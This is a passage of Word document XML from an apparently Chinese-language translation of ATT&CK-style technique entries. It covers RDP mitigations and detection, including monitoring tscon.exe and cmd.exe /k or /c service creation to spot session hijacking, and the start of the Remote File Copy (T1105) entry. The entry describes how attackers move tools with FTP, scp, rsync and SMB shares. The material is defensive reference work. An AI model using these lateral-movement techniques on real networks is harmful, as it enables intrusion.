              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RD</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>会话主机服务器上保持活动状态的最长时间。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="73387D90" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A61638C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId219" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2534BCB7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑从允许通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录的群组列表中删除本地管理员群组。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="289E3EE8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5935E948" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId220" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0443659F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果需要远程访问，请限制远程用户权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59E02252" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06918E0B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1902DED7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用可能是合法的，具体取决于网络环境及其使用方式。其他因素，例如远程登录后的访问模式和活动，可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑或恶意行为。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r>
        <w:t>是否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>用户账号登录他们通常不会访问的系统，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或监控在</w:t>
      </w:r>
      <w:r>
        <w:t>相对较短时间内登录多个系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所用</w:t>
      </w:r>
      <w:r>
        <w:t>的访问模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2BA357" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00745C46" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>tscon.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程的</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B11652">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控使用</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>cmd.exe /k</w:t>
      </w:r>
      <w:r w:rsidRPr="00B11652">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>cmd.exe /c</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00B11652">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来防止</w:t>
      </w:r>
      <w:r>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B11652">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话劫持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>服务创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动</w:t>
      </w:r>
      <w:r w:rsidRPr="00B11652">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B261427" w14:textId="1E4A8223" w:rsidR="00A0413E" w:rsidRPr="00227CA2" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00227CA2">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="00BC3074">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>复制</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="18782F1B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EDFE3F3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>T1105</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E38BB90" w14:textId="20CB594E" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>，横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61807ECB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="198D18C6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54FC3467" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>抓包，网络进程使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>网络协议分析，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A733067" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6014C937" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55B3D668" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EA0D94" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F352513" w14:textId="5948B309" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从一个</w:t>
      </w:r>
      <w:r>
        <w:t>系统复制到另外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>系统，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以便</w:t>
      </w:r>
      <w:r>
        <w:t>在操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程中使用他们</w:t>
      </w:r>
      <w:r>
        <w:t>自己的工具或文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r>
        <w:t>通道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其它</w:t>
      </w:r>
      <w:r>
        <w:t>协议工具（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:t>）从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外部他们</w:t>
      </w:r>
      <w:r>
        <w:t>自己</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:t>中拷贝文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而</w:t>
      </w:r>
      <w:r>
        <w:t>将他们的工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放置</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所</w:t>
      </w:r>
      <w:r>
        <w:t>攻击的网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>还可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>ac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>inux</w:t>
      </w:r>
      <w:r>
        <w:t>自带工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rsync</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC4D2D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会通过</w:t>
      </w:r>
      <w:r>
        <w:t>远程执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:t>固有的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共享</w:t>
      </w:r>
      <w:r>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t>文件共享</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或</w:t>
      </w:r>
      <w:r>
        <w:t>已认证的连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>indows</w:t>
      </w:r>
      <w:r>
        <w:t>管理员共享或远程桌面协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在内部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统之间横向复制文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>从而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47BDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72899A2D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00227CA2" w14:paraId="02A5E99D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="23ECA098" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00227CA2" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00227CA2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="47D99E97" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00227CA2" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00227CA2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="0E250E36" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31FFEEF3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId221" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="427E9BA0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
